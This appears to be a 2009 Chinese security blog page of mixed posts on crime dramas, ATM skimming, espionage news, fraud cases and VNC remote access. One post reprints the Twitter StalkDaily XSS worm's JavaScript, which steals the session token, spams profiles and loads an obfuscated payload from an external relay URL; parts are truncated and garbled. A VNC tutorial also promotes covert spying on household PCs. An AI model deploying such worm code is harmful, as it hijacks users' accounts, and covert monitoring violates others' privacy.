东野圭吾时代的日式刑侦剧

| 2009年8月12日星期三

  "新兴的日式刑侦剧,一改以往的诡异气质,突出角色人性色彩,变得更励志、更时尚"在刚刚落下帷幕的日剧春季档里,日剧《Boss》(天海佑希、竹野内丰主演)和《Mr Brain》(木村拓哉主演)成为挽救该季度惨淡收视的两大功臣,且都可视为最潮的日式刑侦剧。尽管两者噱头各自不同,《Boss》主打天海佑希的“女王控”(意指有强大控制力的成熟女性)和竹野内丰的蓄须造型;《Mr Brain》则有“收视之神”木村拓哉的“怪叔叔”(意指不按牌理出牌、略带猥琐的中年男子)表演,但它们都是日式刑侦剧的最新破格,突出科学理论的指导作用,一改以往该剧种的诡异气质,增加了喜剧成分,突出角色人性色彩,变得更励志、更时尚。而导致这种变化的因素,除了以《CSI》为代表的美式刑侦剧,更重要的则是日本本土炙手可热的悬疑大师东野圭吾。
  日式刑侦剧是与日本侦探小说的发展严密相对应而生的。以江户川乱步、横沟正史为代表的本格派,通过自己的创作,缔造了诸如密室杀人等经典案件;而岛田庄司则通过《占星术杀人魔法》开创了“新本格”风潮。开玩笑地说,本格与新本格之间的区别在于:前者是有人死在密室里,凶手消失;后者是有人死于非命,凶手为尸体建好密室然后消失。新本格由于增加了现实的不可能性,所以诡异气氛更加浓厚。
  小说的流变也影响到日式的刑侦剧风格,在本格和新本格主义流行的时代里,日式刑侦剧的代表是《金田一少年事件薄》和《古畑任三郎》。这两部经典之作都相当长寿,也体现出本格派的所有精华。《金田一少年事件薄》充分发挥“金田一”家族破解离奇恐怖事件的天赋,凸显令人全身毛立的恐怖元素,人性阴暗面被表现得淋漓尽致。
  近年来,东野圭吾走红亚洲。他是集以往前辈之大成的悬疑大师,由于出身理工科,因此比其他作家更擅长也更愿意去尝试以科技为主轴的题材,而其中最有代表性的就是以物理学家汤川学为主角展开的“伽利略系列”。该系列去年被搬上屏幕,迅速大热。剧中的汤川学虽然遇到的案件依然离奇,诸如人头自燃、尸体心脏腐烂、鬼屋震动等,但最终都用相对严谨的科学理论一一破解,剧中涉及到的科学理论包括了折射现象、共振现象、水钠反应等。该剧的恐怖氛围被大大消解,反而激发起观众对科学常识的好奇心。
  东野圭吾和《侦探伽利略》的走红引发了今年春季两部刑侦剧《Boss》和《Mr Brain》的出炉,剧中的侦探们都放弃了完全依靠大脑推理的传统方式,而更倾向于科学实证。比如《Mr Brain》中的九十九龙介则是行为古怪的脑科学家。
  这两部刑侦剧也吸收了美剧同类型剧集的一些营养,《Boss》更明显,比如一改以往日式刑侦剧个人英雄主义的做法,突出团队协作的作用,减少血腥暴力场面,角色更丰满更有人情味儿了,侦探们除了破案,也开始谈恋爱了。天海佑希扮演的女警司就是“大龄剩女”,梦中情人是乔治·克鲁尼。
  日式刑侦剧的新变格朝着更流行、更大众化的方向发展,它将诡异的传奇性转变为轻松的脑力激荡,丰富人物情感层次,更加适合快餐文化下的观众口味,这种变化也是东野圭吾能够走红的重要原因。

More......

显摆一下我的火狐浏览器

| 2009年4月21日星期二

  搞WEB安全估计都这配置了,哈哈。

   

More......

简单制作超具杀伤性武器

| 2009年4月18日星期六

PS:这叫啥呢?武侠电视似曾相识……


下载地址:http://uploadmirrors.com/download/1GX5URS2/JPEG.rar











More......

美国政府为应对网络危险寻求黑客保护

|

  据美联社报道,为应对每日数以百万计的网络攻击和欺诈,美国联邦政府正在积极寻找黑客高手,这次不是为了抓捕他们而是向他们支付费用保护国家网络。
  上月美国通用动态信息技术公司(General Dynamics Information Technology)代表国土安全部发布了一则广告,寻找能像黑客一样思考问题的人。广告里称,申请者必须了解黑客的技术和手段,并能对网络流量进行分析,找出联邦系统中的漏洞。
  上周美国防部长罗伯特・盖茨在提交五角大楼预算申请时,发出了自己的招聘信号。他表示,五角大楼应增加网络专家的数量,在2011年前每年都要培训出80-250名。美国政府的官员表示,在面临新型黑客、网络犯罪和其他威胁上,保护网络的技术创新未能跟上。
  美国的电脑网络包括了五角大楼和其他联邦政府机构的网络,一直处于持续的攻击下,这些攻击有温和的骚扰性攻击也有破坏力很大的袭击。就在上周,美国政府一位前政府官员披露,间谍已经攻入美国国家电网,并留下一些可中断服务的病毒。
  网络威胁也对美国的国家安全造成潜在危险,五角大楼的官员表示,过去半年里为修复网络已经花费了1亿多美元。通用动态信息技术公司的副总裁纳迪亚・萧特(Nadia Short)表示,联邦政府非常需要有道德的黑客加盟。
  前布什政府曾启动了一项政府网络监控计划"爱因斯坦",由美国计算机应急小组(US-CERT)负责。US-CERT是美国国土安全部、其他政府机构和私人公司签署的合作协议。"爱因斯坦"计划是一个自动收集和分享安全信息的计划。萧特称,这项为期4年将耗资6000万美元的协议,将利用有道德黑客分析政府网络面临的危险和开发可减少漏洞的技术。
  一些科技巨头也督促美国政府设立一个白宫级职位,专门负责网络发展和寻找如何与私人部门迅速分享信息的途径,这些公司包括通用动态信息技术公司、IBM、洛克希德-马丁和惠普等。但美国政府一直难以解决一些基础问题,如由谁来控制全国性的网络计划。

More......

ATM维护人员教大家正确使用银行卡和取款机

|

from:http://www.cnbeta.com/articles/82193.htm
  我们每天都在接触银行卡,使用ATM自动取款机,可是普通人对银行卡和ATM了解多少呢?为什么会有银行被盗用,被复制的情况出现呢?为什么很多人说在ATM上取到假钱呢。我不算是个专业人士,只是从事银行ATM维护工作有几年了,这里给大家简单的解密下银行卡和ATM的相关情况,希望给大家正确使用银行卡和ATM做个指导。
  首先说下银行卡,现在最普遍使用的银行卡是磁条卡,另外就是IC卡,我这里只说说磁条卡,因为磁条卡是最容易被盗,被复制的。银行卡背面有一条黑色或其他颜色的宽线条,既为磁条。银行卡磁条是分为三个磁道的,简单的说就是分为三个数据记录区域。第一磁道,根据银行的不同,有的是空白无数据的,有的是记录有该银行卡的卡号的。第二磁道,是记录该银行卡的卡号的,第三磁道,是记录银行卡卡号和加密信息的,该加密信息是银行采用了独特的加密算法,通过对该银行卡的卡号和其他信息计算后,形成的一串数字。每个银行的加密算法肯定是绝密级别的,不可能说被破解。也就是说,不可能别人知道你的卡号,就能制作出你的银行卡。
  既然不能从知道卡号就复制出一张银行卡,从而盗卡的唯一手段,就是利用你的原卡去复制。所以作案人员采用在ATM或其他地方,安装磁条卡读卡器,骗你将银行卡在这些读卡器上刷,然后把你银行卡的磁道信息记录下来,再写入一张其他同类型磁条卡,这样就完成了银行卡的复制。想想现在的银行使用地点,除了 ATM,还有商场,宾馆,饭店等等,你就明白你银行卡信息被盗取的可能性有多大了,在读卡器上一刷,就能复制下来所有磁道信息,再就可以复制。所以使用银行卡时候,一定要保持卡片在你的视线之类,特别是很多银行的信用卡,消费时是不需要密码的,一旦被复制了,罪犯可以随时拿去刷卡消费。
  银行卡在ATM上使用,很多人缺乏一点基本常识就是先看ATM屏幕,再插卡。屏幕上明明显示机器暂停服务,有人就还在那里拼命的往入卡口塞卡。还有,现在各银行ATM屏幕上一般都有一些提示信息,很多人不屑一顾,明明屏幕上提示了发生异常情况应该打银行那个号码的服务电话,还是去轻信贴在ATM旁边的一张纸片上的电话。正确使用ATM,应该是先看ATM屏幕,是否显示的是正常服务画面,提示可以插入卡片,然后再插卡。如果是你经常去使用的ATM,你应该还要留意下,插卡口,是否有异常,因为犯罪分子可能会有安装一个假的入卡口在ATM真正的入卡口前面,盗取卡片信息。
  输入密码时候,先要环顾一下身周围,注意不要陌生人在身后,最好是一个手遮挡住键盘输入区域,一个手输入密码。密码不能复制,但是仅仅6个数字,实在是太容易偷窥记住了。密码和卡片信息,你保护住了一个,你的银行卡就是安全的。特别提示一点,有新闻说到信用卡被人知道卡号和有效期和验证码后三位(即卡背面签名栏末三位数字CVV码),就能电话定机票,所以信用卡的相对普通卡,安全信更差。银行卡在ATM上使用后打出的回单纸,上面的卡号是有几位被星号代替了,但是有很多人可能没留意,银行卡在商场等刷卡使用,打出的回单,卡号是完全显示的,而信用卡的有效期是有印在信用卡上面的。信用卡刷卡消费完以后,回单一定不能随意丢弃,最好看过后,彻底销毁。
  在ATM交易是需要一定时间,插卡输入密码后,选择了你想要的功能,ATM将信息发送到银行总行服务器,跨行交易还要经过银联服务器,根据网络的好坏,都是需要一定时间。每个银行设定的网络的超时时间不一定相同,比如说,你选查询,刚刚好ATM网络故障(ATM信息发送不到主机,或者是主机的响应信息发送不到ATM),到机器屏幕给出提示这个时间,每个银行都有不同,有的可能是一下子就提示你交易失败,有的可能会等1-2分钟,才提示,这时候千万不要离开 ATM,因为这种情况,ATM无法交易,肯定会提示并退出卡片的。
  ATM自动退卡和吞卡的时间呢,一般ATM都是30秒。当你插入卡片,而不进行操作,超过30秒,机器将自动退出你的卡片。这就造成有些人取钱后,忙着点钱和验钞,不对机器操作,过了30秒,卡就会自动被机器退出。如果卡片退出后,不被取走,再过30秒,机器将会把卡片吞入,那你就只能找银行领卡了。吞钞也是,钱如果说送到了出钞口,超过30秒,客户不取走钞票,机器也会自动回收钞票。钞票回收了,钱是不会马上又打入你的卡的。这要等银行方面查明了,再由银行冲回你的卡,一般时间3天,或者更久。
  最好说下ATM出假钞的情况,新闻上这么多反应的,只能说无风不起浪。按照银行正规的操作流程来说,ATM上是不应该出现假币的。为什么这么说,因为银行往ATM上加入的钱,大多数银行并不是使用在柜台客户存入银行的钱,而是每天从地区银行总行金库领用的,领用了拆包直接放入。既然这个钱能入得了银行总行金库,就肯定不会出现假币,现代验钞手段,哪怕是一张钱中间只有极少一部分是假的,比如拼凑上的,都能建议出来。我见过只有十几分之一是假的拼凑币。关于怎么进到ATM我也不知道详情,猜测也是只有内部作祟。有人说在ATM上一下子取到一千,两千都是假的,或者说同一台机器经常有出假的,这个也不足信。作祟人员再大胆,也不可能冒那么大的险,一次放大量假钞进去,或经常动手脚,其中缘由可想而知。大多数人说取到假钱,是在ATM取了钱,不验,往口袋一塞,等到消费时候给人调包了,回头来找银行说ATM取到假钱了。
  如果真的取到假钱了怎么办呢,首先你不要离开ATM,也不可以把钱收入钱包或口袋,应该叫他人帮忙叫银行人员过来,因为ATM都有摄像头监视,你和银行理论时候,可以要求查看监控录像,确认钱就是从ATM出来的,你没动手脚。遇到晚上或者周末银行不上班,以及不是在银行的ATM机器,有一个办法,就是你找到ATM机器上的摄像头位置,将你手中的钞票编码部分,靠近对准摄像头,停留一阵子,确保录像能录下钞票编码。国内基本所有ATM,都有实时监控,你报案都可以要求提取查看的。你只要仔细看一下ATM,一般都能发现摄像头位置,大多在屏幕上方一点,人脸正面,或者是在头顶位置。有针孔的,有有色玻璃框住的。
  说了一些,其实ATM和银行卡还有很多和我们使用息息相关的方方面面,大家知道多点,也就不会产生那么多麻烦和不安全因素。生活源于观察,小心谨慎是关键。

More......

Chinese National Arrested For Source Code Theft

| 2009年4月15日星期三

PS:窃取商业秘密
  A Chinese citizen on a work visa in the United States was arrested by the FBI last week for allegedly revealing proprietary software code owned by his unidentified U.S. employer to a Chinese government agency.
  Yan Zhu, 31, of Lodi, N.J. -- also known as "Westerly Zhu" -- was arrested on charges of theft of trade secrets, conspiracy, wire fraud, and theft of honest services fraud.
  A startup has a new firewall that accurately identifies applications and enforces policies Renown researchers Thomas Ptacek and Joanna Rutkowska square off on rootkit detection Andrew Conry-Murray spoke with the president of RSA, Art Coviello, at EMC World 2008 about Data Loss Prevention.
  A startup has a new firewall that accurately identifies applications and enforces policies
  "Crimes of this nature do not get much public attention," FBI Special Agent in Charge Weysan Dun said in a statement. "No one is shot, there is no crime scene, no prominent public figures are involved. However, this is an act of economic violence -- a paper crime that robs the victim company of the resources they expended to develop a product."
  Dun said that white-collar crimes of this sort are clearly dangerous to America's economic infrastructure. "If American dollars are spent on research and development of a product, and then that product or research is taken without any compensation to American companies, the value of American companies and American products is significantly reduced in the global marketplace," he said.
  David Schafer, the assistant federal public defender representing Zhu, declined to comment or to identify Zhu's former U.S. employer.
  According to the criminal complaint, Zhu's former employer is an unnamed company based in Mercer County, N.J., that develops, implements, and supports software for environmental applications. One of its applications is an environmental information management portal for the Chinese market.
  Zhu, who holds a Ph.D. from Columbia University in geo-environmental engineering, was hired by the U.S. company around April 2006 as a senior environmental engineer and signed a confidentiality agreement.
  In July 2007, the U.S. company signed a contract with Shanxi Province, China, to provide its software to the local Environmental Protection Administration ("Shanxi EPA"). The contract called for four payments totaling about $1.5 million -- a down payment and three subsequent payments following the installation of module 1, modules 2 and 3, and module 4.
  In November 2007, the Shanxi EPA made the down payment of about $3 million. By March 2008, all four modules were installed, but the U.S. company never received further payment.
  The U.S. company subsequently recognized the software it had provided to Shanxi Province had been altered, which would require access to the company's source code. The company also noticed that a Chinese company set up to serve as a payment conduit for the deal was now listed on a Shanxi Web site as a vendor of environmental software.
  The complaint alleges that Zhu e-mailed his company's database and more than 2,000 pages of source code to co-conspirators in China and that the individuals have been selling the U.S. company's software to Chinese government agencies without authorization.
  In its 2008 report to Congress, the U.S.-China Economic and Security Review Commission warned that "China is targeting U.S. government and commercial computers for espionage."
  In 2007, the group said, "Chinese espionage activities in the United States are so extensive that they comprise the single greatest risk to the security of American technologies."
  China, however, is not alone in seeking to obtain U.S. technology through espionage. Many nationals of other countries and U.S. citizens have been involved in technology theft or illegal technology exports.
  Attend a Webcast on why bad security breaches keep happening to good organizations. It happens Wednesday, April 15. Find out more and register.

More......

17岁少年:Twitter XSS蠕虫是我做的

| 2009年4月12日星期日

  这个Mikeyy家伙才17岁,为了在twitter给自己打广告弄的XSS蠕虫,这么恶毒的方式也用上了……

原始XSS Worm:

function XHConn() {
var xmlhttp, bComplete = false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e) {
try {
xmlhttp = new XMLHttpRequest();
}
catch(e) {
xmlhttp = false;
}
}
}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone) {
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET") {
xmlhttp.open(sMethod, sURL + "?" + sVars, true);
sVars = "";
}
else {
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && !bComplete) {
bComplete = true;
fnDone(xmlhttp);
}
};
xmlhttp.send(sVars);
}
catch(z) {
return false;
}
return true;
};
return this;
}

function urlencode(str) {
var histogram = {},
tmp_arr = [];
var ret = str.toString();

var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};

histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';

ret = encodeURIComponent(ret);

for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}

return ret.replace(/(\%([a-z0-9]{2}))/g,
function(full, m1, m2) {
return "%" + m2.toUpperCase();
});

return ret;
}

var content = document.documentElement.innerHTML;
userreg = new RegExp(/");
document.write("");

function wait() {
var content = document.documentElement.innerHTML;

authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);

var Randomupdate = new Array();
randomUpdate[0] = "Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1] = "Join www.StalkDaily.com everyone!";
randomUpdate[2] = "Woooo, www.StalkDaily.com :)";
randomUpdate[3] = "Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4] = "Wow...www.StalkDaily.com";
randomUpdate[5] = "@twitter www.StalkDaily.com";

var genRand = randomUpdate[Math.floor(Math.random() * randomUpdate.length)];

updateEncode = urlencode(genRand);

var xss = urlencode('http://www.stalkdaily.com">
感染方式:
  在Twitter个人资料的locationweb栏插入恶意代码,当其它用户浏览某人个资料时,该XSS蠕虫就会触发。

XSS蠕虫中转站:http://content.ireel.com/xssjs.js
 
var _0x8da4=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x4D\x69\x63\x72\x6F\x73\x6F \x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x63\x6F\x6E\x6E\x65\x63\x74","\x74\x6F\x55\x70\x70 \x65\x72\x43\x61\x73\x65","\x47\x45\x54","\x3F","\x6F\x70\x65\x6E","","\x4D\x65\x74\ x68\x6F\x64","\x50\x4F\x53\x54\x20","\x20\x48\x54\x54\x50\x2F\x31\x2E\x31","\x73\x65\x74\x52 \x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\ x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D \x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","
安全防范:
  1.更改hosts文件,屏蔽传染网址。
  2.使用noscript火狐扩展屏蔽恶意代码
  3.修改个人资料,删除恶意代码


More......

大牛叫你怎样识别假新闻

| 2009年4月4日星期六

PS:原文标题为《学会理性看新闻》,转载过来顺便标题党一下。

  绝大数官方新闻媒体如《环球时报》、电视媒体《CCTV》新闻报道都不客观,一定程度充斥着非客观的虚假新闻,使用扭曲类词语扭曲事件的严重程度,使用差异化词语强调"司法合理",建议学习NLP心理学检定语言模式,学完之后很恐怖,官方媒体到处充斥着假新闻……

from:http://www.daynew.net/?p=1204

大牛:我们有好多记者不会写新闻,起码不能做到客观,包括国家级通讯社的记者,所以让人难以信服,客观上起了帮倒忙的作用,下面就一篇发生在乌鲁木齐的新闻做一下分析,括号里黑体字为大牛所评。

乌鲁木齐发生暴力袭警(暴力袭警是顶大帽子,耸人听闻,其实此案正在进一步调查中,没有任何机关部门定义成暴力袭警,不知何出此言)事件上百人围观(组图)http://www.sina.com.cn 2009年03月31日23:18 中国新闻网

 
  中新网3月31日电 (记者 闫文陆)乌鲁木齐市3月30日晚发生一起妨碍警方执行公务事件,一名民警受伤。目前,受伤民警仍在医院接受治疗。

  据乌鲁木齐市警方介绍(事情完全是警方一面之词,记者下文中连男子代某、路人甲乙丙丁都没有采访,谈得上客观吗?),3月30日21时许,乌鲁木齐市二工派出所3名民警着便装驾驶地方牌照车辆(穿便装,坐地方车,符合执行公务的规定吗?存疑中)押送一名吸毒盗窃犯罪嫌疑人途中,行至东泉路(路的尽头有戒毒所,此条路我骑自行车路过多次,缺天桥和人行横道,行人不得不"违章"穿越马路,你不能要求行人到警官学校的路口去过马路吧))时,遇男子代某违反交通规则横穿马路,民警鸣笛示意,但其不予避让,依然继续在马路中间慢行(车让人是常识,警官没有学过交通规则吗?)。为避免发生事故,民警紧急采取制动措施(这是警察该做的),双方交涉过程中发生口角(口角就说明双方都不怎么文明)。代某遂挥拳从打开的车窗向内击打民警(别忘了,这时的警察是便装,坐地方车,应该属于普通民事纠纷),民警即下车制止,并告知代某民警的警察身份及正在执行公务(第一,仅是口头告之,还是按规定出示警官证,语焉不详;第二,不是救人救火,运送个嫌疑人能有多紧急?如果真紧急,还有闲功夫和老百姓口角吗?),但代某置之不理,乘人不备捡起路边砖块将一民警头部打伤(还是属于口角范畴吧,医生鉴定的伤势结果有吗,代某有没有受伤为什么不讲?),并煽动(夸大其词了吧,跟周围人讲述经过算煽动吗?)周围不明真相的群众(警察为什么不跟群众讲明真相呢?是不屑讲,还是不敢讲?)阻挠民警执行公务(真是公务吗?存疑)。

  此时,碱泉街派出所民警巡逻至此,为避免事态扩大和车内押送的犯罪嫌疑人脱逃,欲将有关民警及代某带回碱泉街派出所调查(有没有包庇同行的嫌疑呢?),闻讯赶来的代某妻子等人继续寻衅,采取脚踢、强拽车门(事情没解决清楚,人家怕警警相护,当然不愿意跟你回去,当然手段不对,暴力了点,不过,前期警察不也对老百姓"口角"了吗,也不怎么文明)等手段,欲将已上警车的民警强行拉下,致使现场警车受损、民警无法正常执行公务,围观群众达200余人,导致该路段交通严重堵塞。市公安局指挥中心接警后,立即指派警力进行现场疏导处置,22时40分许事态平息(市局算是有明白事的人,不愿意把小矛盾继续扩大)。

  目前,此案正在进一步调查中。警方表示将对妨碍执行公务者依法进行处理(第二句也属于瞎定性,执行公务的本身程序和做法就不见得正确,何来妨碍一说,倒是应该核实这几个警察为什么穿便装坐地方车执行公务,公安局没警服警车了?)。

综上所述:记者完全是根据同是当事人的一方面,警方一面之词做的采访,相当的不客观,采信度要打折扣。

图为乌市碱泉街派出所民欲将民警及代某带回碱泉街派出所调查,遭遇围攻人员强行阻拦。亚心网记者 张万德 摄


More......

电视购物陷阱骗及17省市 20余天骗得10万余元

| 2009年4月3日星期五

  PS:又一起滥用与出售的个人资料犯罪事件。

  新闻来源:新华网

  北京顺义警方近日打掉一个在居民楼里以电视购物为名进行诈骗的犯罪团伙。警方昨天通报,共抓获涉案嫌疑人10名,核实上当受骗人员50余人,涉及17个省市,涉案金额10万余元。

  今年320日,天竺派出所民警在对翠竹小区开展走访时,一名房主向民警反映,3月初,一名叫马琴的外地女子租住自己的楼房后,在屋内摆放电脑和多部电话,像是要开公司的样子,但人员每天却很少外出,一天三餐都是马琴的男友邵为在餐厅打包带回来。民警随后随同房东多次以检查房间设施、收取水电费为名对该房间内的人员进行调查。经过一周左右的调查,民警摸清,这家所谓的公司就是让员工冒充某电视购物中心工作人员,在屋里不停地向全国各地打电话推销手机。他们对客户声称的每部998元的3G手机,其实只是廉价的杂牌机甚至是手机模型。

  328日中午,天竺派出所出动警力对该出租房进行突击检查。屋内有十几部电话机,电脑里存有全国各地大量人员信息。见到民警,屋内的10名男女神情非常紧张。马琴和邵为对民警称"我们就是电视购物中心的工作人员,我们不是骗人的"。由于没有事主报案,取证陷入僵局。民警马上又兵分两路,一路核实马琴和邵为的身份,另一路联系被骗的事主。当天晚上7点,证据搜集完毕,马琴和邵为承认他们并非电视购物中心工作人员。

  两人交代,他们自2009226日以来,冒充某电视购物中心的工作人员租房,安装无法查到装机地址的宽带网络电话,再从网上购买大量手机客户的资料信息,并雇佣了8个话务员冒充电视购物工作人员或品牌手机厂家售后服务工作人员,按照马琴提供的个人信息资料,每人每天拨打数百个电话,对客户称只需998 元便可获得一部质优价廉的新款3G手机,骗取客户上钩。一旦有客户同意购买,他们便从木樨园等地购买残、次手机或者手机模型给客户快递过去。客户收到快递打开后才发觉受骗。而受骗事主往往又因为路途遥远,不选择来北京报案。

  到被抓时,该团伙已骗得10万余元,受骗事主多在外省市,目前已联系事主核实了9起。马琴、邵为等人因涉嫌诈骗已被刑事拘留。


More......

How To Set Up Remote Computer Access With Your Mobile Phone

|

PS:在手机上玩3389……
from:http://www.makeuseof.com/tag/set-up-remote-computer-access-with-your-mobile-phone/
Throughout my college years, there were often times when I wished I could set up remote computer access to the PC in my dorm room to email a particular homework file to my professor. Instead, I had to hike the treacherous 1.5 miles, through frigid snowdrifts and throngs of shivering college students, just to reprint and retrieve the homework I’d forgotten to bring with me that morning.

Of course, back then there were no such things as Internet-enabled Windows Mobile devices. In fact, at the time the Internet itself was only in its infancy. Today, there’s not only the Internet, but also these nifty little web-enabled mobile devices that let you do some pretty magical things over the Internet. Not the least of which is connecting and controlling your computer from anywhere in the world.

How to Set Up Remote Computer Access With Your Mobile Phone

Not long ago, the ability to whip out your trusty PocketPC and set up remote computer access to your desktop PC would all have sounded like science fiction. Today, it’s not only a reality, but it’s completely free.

Dave previously wrote about how to remotely control your mobile device with your desktop. There are a lot of reasons why that would be useful. However, the reverse is just as useful. Having the ability to set up remote computer access to your home PC from anywhere in the world has unlimited possibilities. But how exactly does it work?

First, it makes use of free VNC technology, mentioned previously in How to Spy On Your Spouse With Your Computer. You set up the VNC server on your home PC exactly as outlined in that article, but in order to connect to that VNC server, you need a VNC client that works on your Windows Mobile device. The best available client that I’ve found is the open source Windows Mobile .NET VNC Viewer created by Rocky Lo.

How To Set Up And Configure The .NET VNC Mobile Viewer

Rocky Lo wrote his mobile VNC client because there weren’t any other clients available that offered much in terms of functionality. This viewer is an impressive mobile version of the desktop version of the Real VNC client. Upon installing the software, you’ll find that it’s extremely easy to immediately establish a connection to the VNC service running on your Home PC.

Lo’s mobile version offers client-side scaling, full screen mode, and is highly configurable to update as often or as little as you would like. Lo fully tested his latest version on an HP 4150 with Windows Mobile 2003. For this article, I’ve tested it on a HTC/Cingular 8125 Smartphone running Windows Mobile 5.0.

You can even set up your mobile device to simply listen on a particular port for available VNC servers. But in my opinion, the most useful settings in this app are the display options.

You can enable full screen mode, set the orientation for portrait, upside down, or even rotate the computer screen clockwise or counter clockwise so that it shows up on your portable PocketPC screen in the wide format.

You can also change the pixel size from 8-bit to 16-bit, or you can allow the server to define your resolution. These are settings you can tweak if you find that the display updates slowly.

Of course, scaling is a cool method you can use to try to get as much of the computer screen to fit inside your little mobile screen. You can define the width and height, or just scale down the server-side size by as much as a fifth.

Finally, you can configure your mobile VNC client to either update the screen as fast as possible, or disable that feature and update manually. You can also configure it to view the PC screen only, but not manulate it (turning your mobile phone into another cool spy device).

Here, you can see what it looks like when I connect my 8125 SmartPhone to the VNC server running on my family desktop PC. I ran the client software while my phone was connected directly to my home Wi-Fi network. Sending commands to the PC acted instantaneously on the PC itself, but the screen refresh rate on the mobile end took at least 10 to 20 seconds. My settings could use a bit of tweaking.

Using the menu items at the bottom of your mobile screen, you can manually force a screen refresh - a helpful feature when you’re on a slow connection. Other options include sending special keys like control-alt-delete and other tasks typical of a normal VNC viewer.

How to Connect to Your PC While Not at Home

Now, while connecting to your PC remotely is cool when you’re sitting in a different room of your home - it’s astronomically more cool when you’re sitting on a train headed to work and you just remembered you forgot a file on your hard drive at home. How can you configure things so that you can connect your mobile phone through your router? It’s extremely simple.

First, get into your router settings and modify port forwarding. Within Linksys, this is typically under applications & gaming. For VNC, you want to define all requests for port 5900 (for example) to forward to the IP address for the PC that you’ve got running the VNC service in your house.

Then, using your connection with your mobile phone, you will connect to your router’s actual Internet IP address and specify the same port that you’ve just defined forwarding for.

In this screenshot, I’ve logged in from a local Wi-Fi hot spot about 20 miles from my house, and I’ve opened up Thunderbird on my home PC.

Final Words

The most important thing to consider when setting up your mobile phone client is that data transfer speeds have a tremendous impact on performance. I’d never consider trying to connect to my home VNC servers over the cellphone network. While it would work, it would take ages to connect and update.

Instead, try to find local Wi-Fi hot spots to park yourself, have a cup of coffee, and remotely log into your home PC to download emails or initiate a few more Torrent downloads.

Either way, using this mobile software is yet another way you can stay fully connected even when you’re miles away from your home computer.

If you have any opinions, comments, problems setting this up, let us know in the comments.


More......

研究:中国黑客从事网络间谍

|

  PS:核心提示,就是发带毒邮件+邮箱跨站钓鱼攻击……毫无任何技术含量……

  据一份新报告称,中国黑客一项间谍行动从100多个国家的数百台政府电脑中获取了敏感资料。

  多伦多大学(University of Toronto)的专家发现,世界各地共有1295台电脑受到感染。他们注意到该行动窃取文件,并通过网络摄像头和麦克风对用户进行监视和监听。

  该报告再次引发对信息战激烈程度的警惕,特别是对中国黑客攻击的警惕。受感染的"高价值"电脑比例之高表明,存在一项目标明确的间谍活动而不是一个犯罪网络

  研究人员无法确定中国政府是这项被称为"幽灵网"(GhostNet)的黑客行为的背后支持者,但他们指出,受攻击目标都是与北京方面存在特殊利害关系的团体,其中包括西藏独立运动人士。

  报告表示,在1295台受感染电脑中,有397台"或是对中国与西藏、台湾和印度的关系意义重大,或经确定为外国使馆、外交使团、政府部门或国际组织的电脑"。

  这项为期10个月的调查是应西藏流亡政府要求展开的。调查发现,达赖喇嘛办公室多台电脑遭到类似病毒的恶意软件渗透,这种软件会强制电脑执行来自攻击者的指令。

  报告表示,间接证据表明中国政府曾出于"军事与战略情报目的"对这批受到高度关注的目标加以利用。报告称,许多攻击似乎来自海南岛,即中国军方陵水信号情报设施所在地。

  美国新任国家情报总监丹尼斯?布莱尔(Dennis Blair)上周五表示,网络安全"非常重要"。他补充称,最大的威胁来自中国和俄罗斯等有组织的国家,而非穆斯林恐怖主义组织,并表示美国需要提高识别攻击来源地的能力。

  他说:"我认为,在美国组织遭遇的黑客攻击的来源地中,中国可谓位居前列。来自中国的攻击排在第二位,仅次于来自美国国内的攻击,但在外国来源地中,中国排在第一位。"

  美国总统巴拉克?奥巴马(Barack Obama)已下令对网络安全进行审查,因为美国政府机构越来越多地成为黑客攻击的受害者。2007年,中国军方黑客曾渗透进五角大楼 (Pentagon)内供美国国防部长罗伯特?盖茨(Robert Gates)使用的电脑网络。去年,来自中国的黑客又入侵了白宫的电脑系统。

  包括英国和德国在内的其它国家也针对中国黑客对本国政府网络的攻击发出警告。英国情报机构军情五处(MI5)前任主管伊利莎?曼宁汉姆-布勒(Eliza Manningham-Buller)就表示,英国曾是中国黑客攻击的目标,这些攻击似乎受到了政府的资助。

  许多电脑安全专家一直提醒,家庭和办公室的电脑大型网络一旦受到犯罪团伙无从察觉的控制可能造成严重后果。规模最大的僵尸网络(Drone Networks)之一,是由通常被称为Conficker的病毒汇集而成。该网络已捕获数百万台电脑,但其目的仍不得而知。

  相比之下,中国黑客攻击最有趣的特点之一就是其规模很小。行动策划者只瞄准少数几台涉及特殊利害关系的电脑,尽管他们显然可以把网撒得更大。

  《纽约时报》(New York Times)上周末报道了此事。中国驻纽约领事馆的一名发言人对《纽约时报》表示,这项调查是"无稽之谈"。

  多年来,中国黑客被视为世界上最多产和最有才能的黑客群之一。许多源自中国的黑客攻击借助的是先前未披露过的微软(Microsoft)软件漏洞,以及复杂的策划。

  这些间谍会向目标公司的职员发送经过精心设计的电子邮件(这些邮件看上去似乎来自同事),还会提到与收件人职业兴趣相关的最新事件。"幽灵网"侵入系统的方式与此相同。

